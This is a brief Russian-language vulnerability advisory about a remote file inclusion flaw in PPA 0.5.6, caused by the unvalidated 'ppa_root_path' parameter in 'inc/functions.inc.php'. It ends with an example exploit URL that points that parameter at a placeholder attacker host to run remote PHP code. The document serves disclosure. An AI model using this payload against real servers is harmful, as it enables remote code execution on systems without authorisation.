Программа: PPA 0.5.6
Обнаруженная уязвимость позволяет
удаленному пользователю выполнить
произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной
обработки входных данных в параметре 'ppa_root_path'
в сценарии 'inc/functions.inc.php'. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
PHP сценарий на целевой системе.
Пример:
http://[path-to-ppa]/inc/functions.inc.php?config [ppa_root_path]=http://[attacker]
